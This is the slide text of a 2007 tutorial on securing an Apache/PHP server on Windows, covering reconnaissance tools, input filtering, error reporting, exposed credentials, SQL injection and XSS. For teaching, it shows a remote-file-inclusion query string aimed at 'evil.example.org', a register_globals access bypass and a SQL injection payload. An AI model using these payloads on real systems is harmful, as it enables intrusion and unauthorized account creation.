1k likes | 1.01k Views
Learn how to set up a secure personal web server using PHP and Apache on a Windows platform. This tutorial covers installation, hardening, and security measures to protect against common vulnerabilities.
E N D
Creating A Secure, Personal Web Server on a Windows Platform using PHP and Apache Created By: John Gibbons November 27th, 2007
Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois
Overview • PHP • Terminology • Vulnerabilities • Security • Data Filtering • Naming Conventions • Timing • Error Reporting
Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking
Overview • Installing a Personal Web Server • XAMPP • Installation • Hardening Security • Updates
Overview • Review • Conclusion • Sources • Questions
Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois
Background • Apache and PHP are free, open source web development tools. • Apache • In development since 1995 • Software that allows a computer to act as a web server • PHP • Server side HTML embedded scripting language • Allows for the creation of dynamic web pages
Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois
NMAP • Open source tool common used by hackers • Host Discovery • Identifying computers on a network • Port Scanning • Enumerating the open ports on one or more target computers
NMAP • Version Detection • Interrogating listening network services listening on remote computers to determine the application name and version number. • Detection • Remotely determining the operating system and some hardware characteristics of network devices
Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois
Intellitamper • Upon discovering desired (vulnerable) ports/services, directories can be mapped • Attackers can view directories they were not meant to see
Overview • Introduction • Handouts • Background • Targeting Victims • NMAP • Intellitamper • Whois
Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting
PHP Terminology • Public Scripts: Scripts available via a URL • White list: Assuming input to be invalid until proven valid • Data Filtering: Examining data from an external source to ensure it meets the criteria to be considered valid
Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting
PHP Security • Data Filtering • Initialize all variables • Filter all data that comes from an external source • Develop with error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development • Having error_reporting set to E_ALL will help to enforce the initialization of variables, because a reference to an undefined variable generates a notice • Consider all data invalid until it is proven valid
PHP Security • Data Filtering Guidelines • Ensure that data filtering cannot bypassed • Ensure that invalid data cannot be mistaken for valid data • Identify the origin of the data
PHP Security • Register Globals • Disabled by default (version 4.2.0 and greater) • Prevents regular globals from affecting data submitted by the client
PHP Security • Register Globals Example if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } • This page can be requested with ?authorized=1 in the query string to bypass the intended access control
PHP Security • Register Globals Example: include "$path/script.php"; • This page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F • In the query string in order to equate this example to the following: include 'http://evil.example.org/?/script.php'; • If allow_url_fopen is enabled (which it is by default, even in php.ini-recommended), this will include the output of http://evil.example.org/ just as if it were a local file
Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting
PHP Data Filtering • The following validates an email address: <?php $clean = array(); $email_pattern = '/^[^@\s<&>]+@([-a-z0-9]+\.)+[a-z]{2,}$/i'; if (preg_match($email_pattern, $_POST['email'])) { $clean['email'] = $_POST['email']; } ?>
PHP Data Filtering • The following example ensures that $_POST['num'] is an integer: <?php $clean = array(); if ($_POST['num'] == strval(intval($_POST['num']))) { $clean['num'] = $_POST['num']; } ?>
Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting
PHP Naming Conventions • Take a white list approach • Use variable names that are easy to identify as valid • $clean from previous example • Never leave variables in the $_GET and $_POST arrays because they are not easily identifiable as valid
Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting
PHP Timing • Once a PHP script begins to run, the HTTP request has been received • The user no longer has the opportunity to send data • This makes data initialization a very good practice
Overview • PHP • Terminology • Security • Data Filtering • Naming Conventions • Timing • Error Reporting
PHP Error Reporting • error_reporting • Sets level of error reporting • Set to E_ALL for both development and production • error_reporting (E_ALL); • display_errors • Displays errors on screen • Use during development • Disable during production • Could be useful for potential attackers
PHP Error Reporting • log_errors • Should be turned on during production • Will only induce a performance hit if there is a serious number of errors • error_log • Dictates the location for the error log • The web server should have write privileges for this file
PHP Error Reporting • NEW • As of PHP 5.0, there is E_STRICT • not included within E_ALL • useful during development • warns about using depreciated functions
Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking
SQL: Exposed Access Credentials • Many PHP applications interact with a database • Credentials, used for authentication, are sometimes stored in a plain text file: <?php $host = 'example.org'; $username = 'myuser'; $password = 'mypass'; $db = mysql_connect($host, $username, $password); ?>
SQL: Exposed Access Credentials • The previous example would be stored in a file called “db.inc” . • This file in included whenever database access is needed. • This approach offers convinience by storing all credentials in a single file.
SQL: Exposed Access Credentials • Potential problems arise when a document containing credentials is stored somewhere within the document root. • Every document within the document root as a URL associated with it. • Despite not publicly linking to the document, if it is stored in the inappropriate place, it will still be accessible to an attacker.
SQL: Exposed Access Credentials • A simple solution is to place this files, and all modules, outside of the document root. • Both include and require can accept file system paths
SQL: Exposed Access Credentials • Another solution is to place the following in the “httpd.conf” file (this file is only used with apache) <Files ~ "\.inc$"> Order allow,deny Deny from all </Files>
Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking
SQL Injection • Result of data not being filtered. • Example: <?php $sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('{$_POST['reg_username']}', '$reg_password', '{$_POST['reg_email']}')"; ?>
SQL Injection • This simple example allows the user to input a user name, password, and email address in order to create an account. • However, without data filtering, an attacker could enter the following into the user name field: bad_guy', 'mypass', ''), ('good_guy
SQL Injection • Assume the attacker gives a valid email address and the application generates the password “1234” • The SQL statement becomes: $sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('bad_guy', 'mypass', ''), ('good_guy', '1234', 'shiflett@php.net')";
SQL Injection • The attacker has successfully created two accounts, and was able to supply all the information for the “bad guy” account. • The automatically generated password was bypassed
SQL Injection: Protection • Filter your data • Escape your data • Valid input may interfere with SQL formatting. • Use functions native to your database to handle escaping any characters that may interfere. • i.e. mysql_escape_string()
Overview • Methods Used for Attacking Websites • SQL: Exposed Access Credentials • SQL: Injection • Cross Site Scripting (XSS) - Cookie Stealing • Cross Site Request Forgery (CSRF) • PHP: Session Hijacking
Cross Site Scripting (XSS) • Exploit the trust a user has for a particular site. • Users don't necessarily have a high level of trust for any web site, but the browser does. For example, when the browser sends cookies in a request, it is trusting the web site. Users may also have different browsing habits or even different levels of security defined in their browser depending on which site they are visiting.
Cross Site Scripting (XSS) • Generally involve web sites that display external data. • Applications at a heightened risk include forums, web mail clients, and anything that displays syndicated content (such as RSS feeds).